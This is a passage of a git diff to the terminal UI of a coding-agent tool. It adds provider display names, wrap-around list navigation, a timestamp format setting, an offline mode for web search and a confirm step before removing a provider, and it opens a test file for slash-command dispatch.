 			const statusLine = sortedStatuses.join(" ");
-			// Truncate to terminal width with dim ellipsis for consistency with footer style
-			lines.push(truncateToWidth(statusLine, width, theme.fg("dim", "...")));
+			// Match the rest of the footer styling: extension statuses should render
+			// in the same dim color as pwd/stats, with a dim ellipsis on truncation.
+			lines.push(truncateToWidth(theme.fg("dim", statusLine), width, theme.fg("dim", "...")));
 		}
 
 		return lines;
diff --git a/packages/pi-coding-agent/src/modes/interactive/components/model-selector.ts b/packages/pi-coding-agent/src/modes/interactive/components/model-selector.ts
index c86347b6f..9f978ffdf 100644
--- a/packages/pi-coding-agent/src/modes/interactive/components/model-selector.ts
+++ b/packages/pi-coding-agent/src/modes/interactive/components/model-selector.ts
@@ -15,6 +15,15 @@ import { theme } from "../theme/theme.js";
 import { DynamicBorder } from "./dynamic-border.js";
 import { keyHint } from "./keybinding-hints.js";
 
+/** Display names for providers in the model selector UI. */
+const PROVIDER_DISPLAY_NAMES: Record<string, string> = {
+	anthropic: "anthropic-api",
+};
+
+export function providerDisplayName(provider: string): string {
+	return PROVIDER_DISPLAY_NAMES[provider] ?? provider;
+}
+
 function formatTokenCount(count: number): string {
 	if (count >= 1_000_000) {
 		const millions = count / 1_000_000;
@@ -391,7 +400,7 @@ export class ModelSelectorComponent extends Container implements Focusable {
 
 			const ctx = formatTokenCount(item.model.contextWindow);
 			const ctxBadge = theme.fg("muted", `${ctx}`);
-			const providerBadge = theme.fg("muted", `[${item.provider}]`);
+			const providerBadge = theme.fg("muted", `[${providerDisplayName(item.provider)}]`);
 			const checkmark = isCurrent ? theme.fg("success", " ✓") : "";
 
 			let line: string;
@@ -447,7 +456,7 @@ export class ModelSelectorComponent extends Container implements Focusable {
 
 			if (row.kind === "header") {
 				// Provider group header — always unselectable
-				const providerLabel = theme.fg("borderAccent", row.provider);
+				const providerLabel = theme.fg("borderAccent", providerDisplayName(row.provider));
 				const count = theme.fg("muted", ` (${row.count})`);
 				// Add blank line before header if not the very first visible row
 				if (i > startIndex) {
diff --git a/packages/pi-coding-agent/src/modes/interactive/components/oauth-selector.ts b/packages/pi-coding-agent/src/modes/interactive/components/oauth-selector.ts
index 17844be07..33e23df94 100644
--- a/packages/pi-coding-agent/src/modes/interactive/components/oauth-selector.ts
+++ b/packages/pi-coding-agent/src/modes/interactive/components/oauth-selector.ts
@@ -96,14 +96,14 @@ export class OAuthSelectorComponent extends Container {
 
 	handleInput(keyData: string): void {
 		const kb = getEditorKeybindings();
-		// Up arrow
+		// Up arrow (wrap)
 		if (kb.matches(keyData, "selectUp")) {
-			this.selectedIndex = Math.max(0, this.selectedIndex - 1);
+			this.selectedIndex = this.selectedIndex === 0 ? this.allProviders.length - 1 : this.selectedIndex - 1;
 			this.updateList();
 		}
-		// Down arrow
+		// Down arrow (wrap)
 		else if (kb.matches(keyData, "selectDown")) {
-			this.selectedIndex = Math.min(this.allProviders.length - 1, this.selectedIndex + 1);
+			this.selectedIndex = this.selectedIndex === this.allProviders.length - 1 ? 0 : this.selectedIndex + 1;
 			this.updateList();
 		}
 		// Enter
diff --git a/packages/pi-coding-agent/src/modes/interactive/components/provider-manager.ts b/packages/pi-coding-agent/src/modes/interactive/components/provider-manager.ts
index 5944d8c78..aac53ad80 100644
--- a/packages/pi-coding-agent/src/modes/interactive/components/provider-manager.ts
+++ b/packages/pi-coding-agent/src/modes/interactive/components/provider-manager.ts
@@ -13,7 +13,9 @@ import {
 } from "@gsd/pi-tui";
 import type { AuthStorage } from "../../../core/auth-storage.js";
 import { getDiscoverableProviders } from "../../../core/model-discovery.js";
+import { providerDisplayName } from "./model-selector.js";
 import type { ModelRegistry } from "../../../core/model-registry.js";
+import { ModelsJsonWriter } from "../../../core/models-json-writer.js";
 import { theme } from "../theme/theme.js";
 import { rawKeyHint } from "./keybinding-hints.js";
 
@@ -39,8 +41,12 @@ export class ProviderManagerComponent extends Container implements Focusable {
 	private tui: TUI;
 	private authStorage: AuthStorage;
 	private modelRegistry: ModelRegistry;
+	private modelsJsonWriter: ModelsJsonWriter;
 	private onDone: () => void;
 	private onDiscover: (provider: string) => void;
+	private onSetupAuth: (provider: string) => void;
+	private confirmingRemove = false;
+	private hintsContainer: Container;
 
 	constructor(
 		tui: TUI,
@@ -48,26 +54,26 @@ export class ProviderManagerComponent extends Container implements Focusable {
 		modelRegistry: ModelRegistry,
 		onDone: () => void,
 		onDiscover: (provider: string) => void,
+		onSetupAuth?: (provider: string) => void,
 	) {
 		super();
 
 		this.tui = tui;
 		this.authStorage = authStorage;
 		this.modelRegistry = modelRegistry;
+		this.modelsJsonWriter = new ModelsJsonWriter(this.modelRegistry.modelsJsonPath);
 		this.onDone = onDone;
 		this.onDiscover = onDiscover;
+		this.onSetupAuth = onSetupAuth ?? (() => {});
 
 		// Header
 		this.addChild(new Text(theme.fg("accent", "Provider Manager"), 0, 0));
 		this.addChild(new Spacer(1));
 
 		// Hints
-		const hints = [
-			rawKeyHint("d", "discover"),
-			rawKeyHint("r", "remove auth"),
-			rawKeyHint("esc", "close"),
-		].join("  ");
-		this.addChild(new Text(hints, 0, 0));
+		this.hintsContainer = new Container();
+		this.addChild(this.hintsContainer);
+		this.updateHints();
 		this.addChild(new Spacer(1));
 
 		// List
@@ -102,6 +108,34 @@ export class ProviderManagerComponent extends Container implements Focusable {
 				supportsDiscovery: discoverableSet.has(name),
 				modelCount: providerModelCounts.get(name) ?? 0,
 			}));
+		this.clampSelectedIndex();
+	}
+
+	private clampSelectedIndex(): void {
+		if (this.providers.length === 0) {
+			this.selectedIndex = 0;
+			return;
+		}
+		this.selectedIndex = Math.min(this.selectedIndex, this.providers.length - 1);
+	}
+
+	private updateHints(): void {
+		this.hintsContainer.clear();
+		if (this.confirmingRemove) {
+			const hints = [
+				rawKeyHint("r", "confirm removal"),
+				rawKeyHint("esc", "cancel"),
+			].join("  ");
+			this.hintsContainer.addChild(new Text(hints, 0, 0));
+		} else {
+			const hints = [
+				rawKeyHint("enter", "setup auth"),
+				rawKeyHint("d", "discover"),
+				rawKeyHint("r", "remove auth"),
+				rawKeyHint("esc", "close"),
+			].join("  ");
+			this.hintsContainer.addChild(new Text(hints, 0, 0));
+		}
 	}
 
 	private updateList(): void {
@@ -116,7 +150,7 @@ export class ProviderManagerComponent extends Container implements Focusable {
 			const countBadge = theme.fg("muted", `(${p.modelCount} models)`);
 
 			const prefix = isSelected ? theme.fg("accent", "> ") : "  ";
-			const nameText = isSelected ? theme.fg("accent", p.name) : p.name;
+			const nameText = isSelected ? theme.fg("accent", providerDisplayName(p.name)) : providerDisplayName(p.name);
 
 			const parts = [prefix, nameText, " ", authBadge];
 			if (discoveryBadge) parts.push(" ", discoveryBadge);
@@ -144,7 +178,13 @@ export class ProviderManagerComponent extends Container implements Focusable {
 			this.updateList();
 			this.tui.requestRender();
 		} else if (kb.matches(keyData, "selectCancel")) {
-			this.onDone();
+			if (this.confirmingRemove) {
+				this.confirmingRemove = false;
+				this.updateHints();
+				this.tui.requestRender();
+			} else {
+				this.onDone();
+			}
 		} else if (keyData === "d" || keyData === "D") {
 			const provider = this.providers[this.selectedIndex];
 			if (provider?.supportsDiscovery) {
@@ -153,10 +193,26 @@ export class ProviderManagerComponent extends Container implements Focusable {
 		} else if (keyData === "r" || keyData === "R") {
 			const provider = this.providers[this.selectedIndex];
 			if (provider?.hasAuth) {
-				this.authStorage.remove(provider.name);
-				this.loadProviders();
-				this.updateList();
-				this.tui.requestRender();
+				if (this.confirmingRemove) {
+					this.confirmingRemove = false;
+					this.authStorage.remove(provider.name);
+					this.modelsJsonWriter.removeProvider(provider.name);
+					this.modelRegistry.refresh();
+					this.loadProviders();
+					this.updateHints();
+					this.updateList();
+					this.tui.requestRender();
+				} else {
+					this.confirmingRemove = true;
+					this.updateHints();
+					this.tui.requestRender();
+				}
+			}
+		} else if (kb.matches(keyData, "selectConfirm")) {
+			// Enter key → initiate auth setup for the selected provider (#3579)
+			const provider = this.providers[this.selectedIndex];
+			if (provider) {
+				this.onSetupAuth(provider.name);
 			}
 		}
 	}
diff --git a/packages/pi-coding-agent/src/modes/interactive/components/scoped-models-selector.ts b/packages/pi-coding-agent/src/modes/interactive/components/scoped-models-selector.ts
index 22f677540..2e1c9e41e 100644
--- a/packages/pi-coding-agent/src/modes/interactive/components/scoped-models-selector.ts
+++ b/packages/pi-coding-agent/src/modes/interactive/components/scoped-models-selector.ts
@@ -1,4 +1,5 @@
 import type { Model } from "@gsd/pi-ai";
+import { providerDisplayName } from "./model-selector.js";
 import {
 	Container,
 	type Focusable,
@@ -204,7 +205,7 @@ export class ScopedModelsSelectorComponent extends Container implements Focusabl
 			const isSelected = i === this.selectedIndex;
 			const prefix = isSelected ? theme.fg("accent", "→ ") : "  ";
 			const modelText = isSelected ? theme.fg("accent", item.model.id) : item.model.id;
-			const providerBadge = theme.fg("muted", ` [${item.model.provider}]`);
+			const providerBadge = theme.fg("muted", ` [${providerDisplayName(item.model.provider)}]`);
 			const status = allEnabled ? "" : item.enabled ? theme.fg("success", " ✓") : theme.fg("dim", " ✗");
 			this.listContainer.addChild(new Text(`${prefix}${modelText}${providerBadge}${status}`, 0, 0));
 		}
@@ -318,14 +319,9 @@ export class ScopedModelsSelectorComponent extends Container implements Focusabl
 			return;
 		}
 
-		// Ctrl+C - clear search or cancel if empty
+		// Ctrl+C - always cancel immediately
 		if (matchesKey(data, Key.ctrl("c"))) {
-			if (this.searchInput.getValue()) {
-				this.searchInput.setValue("");
-				this.refresh();
-			} else {
-				this.callbacks.onCancel();
-			}
+			this.callbacks.onCancel();
 			return;
 		}
 
diff --git a/packages/pi-coding-agent/src/modes/interactive/components/session-selector.ts b/packages/pi-coding-agent/src/modes/interactive/components/session-selector.ts
index ff37698e0..ac08e7761 100644
--- a/packages/pi-coding-agent/src/modes/interactive/components/session-selector.ts
+++ b/packages/pi-coding-agent/src/modes/interactive/components/session-selector.ts
@@ -570,13 +570,13 @@ class SessionList implements Component, Focusable {
 			return;
 		}
 
-		// Up arrow
+		// Up arrow (wrap)
 		if (kb.matches(keyData, "selectUp")) {
-			this.selectedIndex = Math.max(0, this.selectedIndex - 1);
+			this.selectedIndex = this.selectedIndex === 0 ? this.filteredSessions.length - 1 : this.selectedIndex - 1;
 		}
-		// Down arrow
+		// Down arrow (wrap)
 		else if (kb.matches(keyData, "selectDown")) {
-			this.selectedIndex = Math.min(this.filteredSessions.length - 1, this.selectedIndex + 1);
+			this.selectedIndex = this.selectedIndex === this.filteredSessions.length - 1 ? 0 : this.selectedIndex + 1;
 		}
 		// Page up - jump up by maxVisible items
 		else if (kb.matches(keyData, "selectPageUp")) {
diff --git a/packages/pi-coding-agent/src/modes/interactive/components/settings-selector.ts b/packages/pi-coding-agent/src/modes/interactive/components/settings-selector.ts
index 425154982..5b324af2c 100644
--- a/packages/pi-coding-agent/src/modes/interactive/components/settings-selector.ts
+++ b/packages/pi-coding-agent/src/modes/interactive/components/settings-selector.ts
@@ -45,6 +45,7 @@ export interface SettingsConfig {
 	respectGitignoreInPicker: boolean;
 	quietStartup: boolean;
 	clearOnShrink: boolean;
+	timestampFormat: "date-time-iso" | "date-time-us";
 }
 
 export interface SettingsCallbacks {
@@ -69,6 +70,7 @@ export interface SettingsCallbacks {
 	onRespectGitignoreInPickerChange: (enabled: boolean) => void;
 	onQuietStartupChange: (enabled: boolean) => void;
 	onClearOnShrinkChange: (enabled: boolean) => void;
+	onTimestampFormatChange: (format: "date-time-iso" | "date-time-us") => void;
 	onCancel: () => void;
 }
 
@@ -355,6 +357,16 @@ export class SettingsSelectorComponent extends Container {
 			values: ["true", "false"],
 		});
 
+		// Timestamp format (insert after respect-gitignore-in-picker)
+		const gitignoreIndex = items.findIndex((item) => item.id === "respect-gitignore-in-picker");
+		items.splice(gitignoreIndex + 1, 0, {
+			id: "timestamp-format",
+			label: "Timestamp format",
+			description: "Date/time format for message timestamps",
+			currentValue: config.timestampFormat,
+			values: ["date-time-iso", "date-time-us"],
+		});
+
 		// Add borders
 		this.addChild(new DynamicBorder());
 
@@ -420,6 +432,9 @@ export class SettingsSelectorComponent extends Container {
 					case "respect-gitignore-in-picker":
 						callbacks.onRespectGitignoreInPickerChange(newValue === "true");
 						break;
+					case "timestamp-format":
+						callbacks.onTimestampFormatChange(newValue as "date-time-iso" | "date-time-us");
+						break;
 				}
 			},
 			callbacks.onCancel,
diff --git a/packages/pi-coding-agent/src/modes/interactive/components/skill-invocation-message.ts b/packages/pi-coding-agent/src/modes/interactive/components/skill-invocation-message.ts
index adbf71fd9..4e88f8eff 100644
--- a/packages/pi-coding-agent/src/modes/interactive/components/skill-invocation-message.ts
+++ b/packages/pi-coding-agent/src/modes/interactive/components/skill-invocation-message.ts
@@ -35,7 +35,7 @@ export class SkillInvocationMessageComponent extends Box {
 
 		if (this.expanded) {
 			// Expanded: label + skill name header + full content
-			const label = theme.fg("customMessageLabel", `\x1b[1m[skill]\x1b[22m`);
+			const label = theme.fg("customMessageLabel", theme.bold("[skill]"));
 			this.addChild(new Text(label, 0, 0));
 			const header = `**${this.skillBlock.name}**\n\n`;
 			this.addChild(
@@ -46,7 +46,7 @@ export class SkillInvocationMessageComponent extends Box {
 		} else {
 			// Collapsed: single line - [skill] name (hint to expand)
 			const line =
-				theme.fg("customMessageLabel", `\x1b[1m[skill]\x1b[22m `) +
+				theme.fg("customMessageLabel", theme.bold("[skill]") + " ") +
 				theme.fg("customMessageText", this.skillBlock.name) +
 				theme.fg("dim", ` (${editorKey("expandTools")} to expand)`);
 			this.addChild(new Text(line, 0, 0));
diff --git a/packages/pi-coding-agent/src/modes/interactive/components/timestamp.ts b/packages/pi-coding-agent/src/modes/interactive/components/timestamp.ts
new file mode 100644
index 000000000..0380571ca
--- /dev/null
+++ b/packages/pi-coding-agent/src/modes/interactive/components/timestamp.ts
@@ -0,0 +1,48 @@
+/**
+ * Timestamp formatting for message display.
+ *
+ * Formats:
+ * - "time-date-iso":  10:34 2025-03-24    (default)
+ * - "date-time-iso":  2025-03-24 10:34
+ * - "time-date-us":   10:34 AM 03/24/2025
+ * - "date-time-us":   03/24/2025 10:34 AM
+ */
+
+export type TimestampFormat = "date-time-iso" | "date-time-us";
+
+function pad2(n: number): string {
+	return n.toString().padStart(2, "0");
+}
+
+function isoDate(d: Date): string {
+	return `${d.getFullYear()}-${pad2(d.getMonth() + 1)}-${pad2(d.getDate())}`;
+}
+
+function isoTime(d: Date): string {
+	return `${pad2(d.getHours())}:${pad2(d.getMinutes())}`;
+}
+
+function usDate(d: Date): string {
+	return `${pad2(d.getMonth() + 1)}-${pad2(d.getDate())}-${d.getFullYear()}`;
+}
+
+function usTime(d: Date): string {
+	const hours = d.getHours();
+	const period = hours >= 12 ? "PM" : "AM";
+	const h = hours % 12 || 12;
+	return `${h}:${pad2(d.getMinutes())} ${period}`;
+}
+
+/**
+ * Format a timestamp for message display using the specified format.
+ */
+export function formatTimestamp(timestamp: number, format: TimestampFormat = "date-time-iso"): string {
+	const d = new Date(timestamp);
+
+	switch (format) {
+		case "date-time-iso":
+			return `${isoDate(d)} ${isoTime(d)}`;
+		case "date-time-us":
+			return `${usDate(d)} ${usTime(d)}`;
+	}
+}
diff --git a/packages/pi-coding-agent/src/modes/interactive/components/tool-execution.ts b/packages/pi-coding-agent/src/modes/interactive/components/tool-execution.ts
index 80d25b0f0..1b1c547d9 100644
--- a/packages/pi-coding-agent/src/modes/interactive/components/tool-execution.ts
+++ b/packages/pi-coding-agent/src/modes/interactive/components/tool-execution.ts
@@ -3,6 +3,7 @@ import {
 	Container,
 	getCapabilities,
 	Image,
+	type ImageDimensions,
 	imageFallback,
 	Spacer,
 	Text,
@@ -32,7 +33,7 @@ const WRITE_PARTIAL_FULL_HIGHLIGHT_LINES = 50;
  * Replace tabs with spaces for consistent rendering
  */
 function replaceTabs(text: string): string {
-	return text.replace(/\t/g, "   ");
+	return text.replace(/\t/g, "    ");
 }
 
 /**
@@ -88,6 +89,9 @@ export class ToolExecutionComponent extends Container {
 	private editDiffArgsKey?: string; // Track which args the preview is for
 	// Cached converted images for Kitty protocol (which requires PNG), keyed by index
 	private convertedImages: Map<number, { data: string; mimeType: string }> = new Map();
+	// Cached resolved image dimensions to avoid re-triggering async parsing
+	// when updateDisplay() recreates Image components (#3455).
+	private resolvedImageDimensions: Map<number, ImageDimensions> = new Map();
 	// Incremental syntax highlighting cache for write tool call args
 	private writeHighlightCache?: WriteHighlightCache;
 	// When true, this component intentionally renders no lines
@@ -137,6 +141,15 @@ export class ToolExecutionComponent extends Container {
 		return isBuiltInName && !hasCustomRenderers;
 	}
 
+	dispose(): void {
+		this.convertedImages.clear();
+		this.imageComponents = [];
+		this.imageSpacers = [];
+		this.editDiffPreview = undefined;
+		this.writeHighlightCache = undefined;
+		this.result = undefined;
+	}
+
 	updateArgs(args: any): void {
 		this.args = args;
 		if (this.toolName === "write" && this.isPartial) {
@@ -472,16 +485,28 @@ export class ToolExecutionComponent extends Container {
 					const spacer = new Spacer(1);
 					this.addChild(spacer);
 					this.imageSpacers.push(spacer);
+					// Pass cached dimensions to avoid re-triggering async parsing
+					// when updateDisplay() recreates Image components (#3455).
+					const cachedDims = this.resolvedImageDimensions.get(i);
 					const imageComponent = new Image(
 						imageData,
 						imageMimeType,
 						{ fallbackColor: (s: string) => theme.fg("toolOutput", s) },
 						{ maxWidthCells: 60 },
+						cachedDims,
 					);
-					imageComponent.setOnDimensionsResolved(() => {
-						this.updateDisplay();
-						this.ui.requestRender();
-					});
+					if (!cachedDims) {
+						const imgIdx = i;
+						imageComponent.setOnDimensionsResolved(() => {
+							// Cache resolved dimensions so future updateDisplay() calls
+							// don't re-trigger async parsing → infinite loop (#3455).
+							const dims = imageComponent.getDimensions?.();
+							if (dims) this.resolvedImageDimensions.set(imgIdx, dims);
+							// Just re-render — don't call updateDisplay() which would
+							// destroy and recreate all Image components.
+							this.ui.requestRender();
+						});
+					}
 					this.imageComponents.push(imageComponent);
 					this.addChild(imageComponent);
 				}
@@ -895,7 +920,9 @@ export class ToolExecutionComponent extends Container {
 			// Server-side Anthropic web search
 			text = theme.fg("toolTitle", theme.bold("web search"));
 
-			if (this.result) {
+			if (process.env.PI_OFFLINE === "1") {
+				text += "\n\n" + theme.fg("muted", "\u{1F50C} Offline \u{2014} web search unavailable");
+			} else if (this.result) {
 				const output = this.getTextOutput().trim();
 				if (output) {
 					const lines = output.split("\n");
@@ -913,8 +940,13 @@ export class ToolExecutionComponent extends Container {
 			// Generic tool (shouldn't reach here for custom tools)
 			text = theme.fg("toolTitle", theme.bold(this.toolName));
 
-			const content = JSON.stringify(this.args, null, 2);
-			text += `\n\n${content}`;
+			const contentLines = JSON.stringify(this.args, null, 2).split("\n");
+			const maxContentLines = 20;
+			const truncatedContent = contentLines.slice(0, maxContentLines);
+			if (contentLines.length > maxContentLines) {
+				truncatedContent.push("...");
+			}
+			text += `\n\n${truncatedContent.join("\n")}`;
 			const output = this.getTextOutput();
 			if (output) {
 				text += `\n${output}`;
diff --git a/packages/pi-coding-agent/src/modes/interactive/components/user-message-selector.ts b/packages/pi-coding-agent/src/modes/interactive/components/user-message-selector.ts
index 94ccf93df..800232faa 100644
--- a/packages/pi-coding-agent/src/modes/interactive/components/user-message-selector.ts
+++ b/packages/pi-coding-agent/src/modes/interactive/components/user-message-selector.ts
@@ -131,9 +131,10 @@ export class UserMessageSelectorComponent extends Container {
 		this.addChild(new Spacer(1));
 		this.addChild(new DynamicBorder());
 
-		// Auto-cancel if no messages
+		// Auto-cancel if no messages — invoke synchronously via microtask
+		// to avoid the 100ms visual flicker from setTimeout
 		if (messages.length === 0) {
-			setTimeout(() => onCancel(), 100);
+			Promise.resolve().then(() => onCancel());
 		}
 	}
 
diff --git a/packages/pi-coding-agent/src/modes/interactive/components/user-message.ts b/packages/pi-coding-agent/src/modes/interactive/components/user-message.ts
index a6de30a62..8aab303ba 100644
--- a/packages/pi-coding-agent/src/modes/interactive/components/user-message.ts
+++ b/packages/pi-coding-agent/src/modes/interactive/components/user-message.ts
@@ -1,15 +1,21 @@
-import { Container, Markdown, type MarkdownTheme, Spacer } from "@gsd/pi-tui";
+import { Container, Markdown, type MarkdownTheme, Spacer, Text } from "@gsd/pi-tui";
 import { getMarkdownTheme, theme } from "../theme/theme.js";
+import { formatTimestamp, type TimestampFormat } from "./timestamp.js";
 
 const OSC133_ZONE_START = "\x1b]133;A\x07";
 const OSC133_ZONE_END = "\x1b]133;B\x07";
 
 /**
- * Component that renders a user message
+ * Component that renders a user message with a right-aligned timestamp.
  */
 export class UserMessageComponent extends Container {
-	constructor(text: string, markdownTheme: MarkdownTheme = getMarkdownTheme()) {
+	private timestamp: number | undefined;
+	private timestampFormat: TimestampFormat;
+
+	constructor(text: string, markdownTheme: MarkdownTheme = getMarkdownTheme(), timestamp?: number, timestampFormat: TimestampFormat = "date-time-iso") {
 		super();
+		this.timestamp = timestamp;
+		this.timestampFormat = timestampFormat;
 		this.addChild(new Spacer(1));
 		this.addChild(
 			new Markdown(text, 1, 1, markdownTheme, {
@@ -25,6 +31,15 @@ export class UserMessageComponent extends Container {
 			return lines;
 		}
 
+		// Insert right-aligned timestamp above the message content
+		if (this.timestamp) {
+			const timeStr = formatTimestamp(this.timestamp, this.timestampFormat);
+			const label = theme.fg("dim", timeStr);
+			const padding = Math.max(0, width - timeStr.length - 1);
+			const timestampLine = " ".repeat(padding) + label;
+			lines.splice(0, 0, timestampLine);
+		}
+
 		lines[0] = OSC133_ZONE_START + lines[0];
 		lines[lines.length - 1] = lines[lines.length - 1] + OSC133_ZONE_END;
 		return lines;
diff --git a/packages/pi-coding-agent/src/modes/interactive/controllers/chat-controller.ts b/packages/pi-coding-agent/src/modes/interactive/controllers/chat-controller.ts
index 32f10d339..0fed98bd4 100644
--- a/packages/pi-coding-agent/src/modes/interactive/controllers/chat-controller.ts
+++ b/packages/pi-coding-agent/src/modes/interactive/controllers/chat-controller.ts
@@ -6,6 +6,9 @@ import { AssistantMessageComponent } from "../components/assistant-message.js";
 import { ToolExecutionComponent } from "../components/tool-execution.js";
 import { appKey } from "../components/keybinding-hints.js";
 
+// Tracks the last processed content index to avoid re-scanning all blocks on every message_update
+let lastProcessedContentIndex = 0;
+
 export async function handleAgentEvent(host: InteractiveModeStateHost & {
 	init: () => Promise<void>;
 	getMarkdownThemeWithSettings: () => any;
@@ -28,6 +31,11 @@ export async function handleAgentEvent(host: InteractiveModeStateHost & {
 
 	host.footer.invalidate();
 
+	// Reset content index tracker when a new assistant message starts
+	if (event.type === "message_start" && event.message.role === "assistant") {
+		lastProcessedContentIndex = 0;
+	}
+
 	switch (event.type) {
 		case "session_state_changed":
 			switch (event.reason) {
@@ -100,6 +108,7 @@ export async function handleAgentEvent(host: InteractiveModeStateHost & {
 					undefined,
 					host.hideThinkingBlock,
 					host.getMarkdownThemeWithSettings(),
+					host.settingsManager.getTimestampFormat(),
 				);
 				host.streamingMessage = event.message;
 				host.chatContainer.addChild(host.streamingComponent);
@@ -112,7 +121,9 @@ export async function handleAgentEvent(host: InteractiveModeStateHost & {
 			if (host.streamingComponent && event.message.role === "assistant") {
 				host.streamingMessage = event.message;
 				host.streamingComponent.updateContent(host.streamingMessage);
-				for (const content of host.streamingMessage.content) {
+				const contentBlocks = host.streamingMessage.content;
+				for (let i = lastProcessedContentIndex; i < contentBlocks.length; i++) {
+					const content = contentBlocks[i];
 					if (content.type === "toolCall") {
 						if (!host.pendingTools.has(content.id)) {
 							const component = new ToolExecutionComponent(
@@ -144,16 +155,28 @@ export async function handleAgentEvent(host: InteractiveModeStateHost & {
 					} else if (content.type === "webSearchResult") {
 						const component = host.pendingTools.get(content.toolUseId);
 						if (component) {
-							const searchContent = content.content;
-							const isError = searchContent && typeof searchContent === "object" && "type" in (searchContent as any) && (searchContent as any).type === "web_search_tool_result_error";
-							component.updateResult({
-								content: [{ type: "text", text: host.formatWebSearchResult(searchContent) }],
-								isError: !!isError,
-							});
-							host.pendingTools.delete(content.toolUseId);
+							if (process.env.PI_OFFLINE === "1") {
+								component.updateResult({
+									content: [{ type: "text", text: "Web search disabled (offline mode)" }],
+									isError: false,
+								});
+							} else {
+								const searchContent = content.content;
+								const isError = searchContent && typeof searchContent === "object" && "type" in (searchContent as any) && (searchContent as any).type === "web_search_tool_result_error";
+								component.updateResult({
+									content: [{ type: "text", text: host.formatWebSearchResult(searchContent) }],
+									isError: !!isError,
+								});
+							}
 						}
 					}
 				}
+				// Update index: fully processed blocks won't need re-scanning.
+				// Keep the last block's index (it may still be accumulating data),
+				// so we re-check it next time but skip all earlier ones.
+				if (contentBlocks.length > 0) {
+					lastProcessedContentIndex = Math.max(0, contentBlocks.length - 1);
+				}
 				host.ui.requestRender();
 			}
 			break;
@@ -330,5 +353,12 @@ export async function handleAgentEvent(host: InteractiveModeStateHost & {
 			host.showError(event.reason);
 			host.ui.requestRender();
 			break;
+
+		case "image_overflow_recovery":
+			host.showStatus(
+				`Removed ${event.strippedCount} older image(s) to comply with API limits. Retrying...`,
+			);
+			host.ui.requestRender();
+			break;
 	}
 }
diff --git a/packages/pi-coding-agent/src/modes/interactive/controllers/input-controller.test.ts b/packages/pi-coding-agent/src/modes/interactive/controllers/input-controller.test.ts
new file mode 100644
index 000000000..6f5d22da5
--- /dev/null
+++ b/packages/pi-coding-agent/src/modes/interactive/controllers/input-controller.test.ts
@@ -0,0 +1,183 @@
+import assert from "node:assert/strict";
+import test from "node:test";
+
+import { setupEditorSubmitHandler } from "./input-controller.js";
+
+type HostOptions = {
+	knownSlashCommands?: string[];
+};
+
+function getSlashCommandName(text: string): string {
+	const trimmed = text.trim();
+	const spaceIndex = trimmed.indexOf(" ");
+	return spaceIndex === -1 ? trimmed.slice(1) : trimmed.slice(1, spaceIndex);
+}
+
+function createHost(options: HostOptions = {}) {
+	const prompted: string[] = [];
+	const errors: string[] = [];
+	const warnings: string[] = [];
+	const history: string[] = [];
+	const knownSlashCommands = new Set(options.knownSlashCommands ?? []);
+	let editorText = "";
+	let settingsOpened = 0;
+
+	const editor = {
+		setText(text: string) {
+			editorText = text;
+		},
+		getText() {
+			return editorText;
+		},
+		addToHistory(text: string) {
+			history.push(text);
+		},
+	};
+
+	const host = {
+		defaultEditor: editor as typeof editor & { onSubmit?: (text: string) => Promise<void> },
+		editor,
+		session: {
+			isBashRunning: false,
+			isCompacting: false,
+			isStreaming: false,
+			prompt: async (text: string) => {
+				prompted.push(text);
+			},
+		},
+		ui: {
+			requestRender() {},
+		},
+		getSlashCommandContext: () => ({
+			showSettingsSelector: () => {
+				settingsOpened += 1;
+			},
+		}),
+		handleBashCommand: async () => {},
+		showWarning(message: string) {
+			warnings.push(message);
+		},
+		showError(message: string) {
+			errors.push(message);
+		},
+		updateEditorBorderColor() {},
+		isExtensionCommand() {
+			return false;
+		},
+		isKnownSlashCommand(text: string) {
+			return knownSlashCommands.has(getSlashCommandName(text));
+		},
+		queueCompactionMessage() {},
+		updatePendingMessagesDisplay() {},
+		flushPendingBashComponents() {},
+	};
+
+	setupEditorSubmitHandler(host as any);
+
+	return {
+		host: host as typeof host & { defaultEditor: typeof editor & { onSubmit: (text: string) => Promise<void> } },
+		prompted,
+		errors,
+		warnings,
+		history,
+		getEditorText: () => editorText,
+		getSettingsOpened: () => settingsOpened,
+	};
+}
+
+test("input-controller: built-in slash commands stay in TUI dispatch", async () => {
+	const { host, prompted, errors, getSettingsOpened, getEditorText } = createHost();
+
+	await host.defaultEditor.onSubmit("/settings");
+
+	assert.equal(getSettingsOpened(), 1, "built-in /settings should open the settings selector");
+	assert.deepEqual(prompted, [], "built-in slash commands should not reach session.prompt");
+	assert.deepEqual(errors, [], "built-in slash commands should not show errors");
+	assert.equal(getEditorText(), "", "built-in slash commands should clear the editor after handling");
+});
+
+test("input-controller: extension slash commands fall through to session.prompt", async () => {
+	const { host, prompted, errors, history } = createHost({ knownSlashCommands: ["gsd"] });
+
+	await host.defaultEditor.onSubmit("/gsd help");
+
+	assert.deepEqual(prompted, ["/gsd help"], "known extension slash commands should reach session.prompt");
+	assert.deepEqual(errors, [], "known extension slash commands should not show unknown-command errors");
+	assert.deepEqual(history, ["/gsd help"], "known extension slash commands should still be added to history");
+});
+
+test("input-controller: prompt template slash commands fall through to session.prompt", async () => {
+	const { host, prompted, errors } = createHost({ knownSlashCommands: ["daily"] });
+
+	await host.defaultEditor.onSubmit("/daily focus area");
+
+	assert.deepEqual(prompted, ["/daily focus area"]);
+	assert.deepEqual(errors, []);
+});
+
+test("input-controller: skill slash commands fall through to session.prompt", async () => {
+	const { host, prompted, errors } = createHost({ knownSlashCommands: ["skill:create-skill"] });
+
+	await host.defaultEditor.onSubmit("/skill:create-skill routing bug");
+
+	assert.deepEqual(prompted, ["/skill:create-skill routing bug"]);
+	assert.deepEqual(errors, []);
+});
+
+test("input-controller: disabled skill slash commands stay unknown", async () => {
+	const { host, prompted, errors } = createHost();
+
+	await host.defaultEditor.onSubmit("/skill:create-skill routing bug");
+
+	assert.deepEqual(prompted, []);
+	assert.deepEqual(errors, ["Unknown command: /skill:create-skill. Use slash autocomplete to see available commands."]);
+});
+
+test("input-controller: /export prefix does not swallow unrelated slash commands", async () => {
+	const { host, prompted, errors } = createHost();
+
+	await host.defaultEditor.onSubmit("/exportfoo");
+
+	assert.deepEqual(prompted, []);
+	assert.deepEqual(errors, ["Unknown command: /exportfoo. Use slash autocomplete to see available commands."]);
+});
+
+test("input-controller: truly unknown slash commands stop before session.prompt", async () => {
+	const { host, prompted, errors, getEditorText } = createHost();
+
+	await host.defaultEditor.onSubmit("/definitely-not-a-command");
+
+	assert.deepEqual(prompted, [], "unknown slash commands should not reach session.prompt");
+	assert.deepEqual(
+		errors,
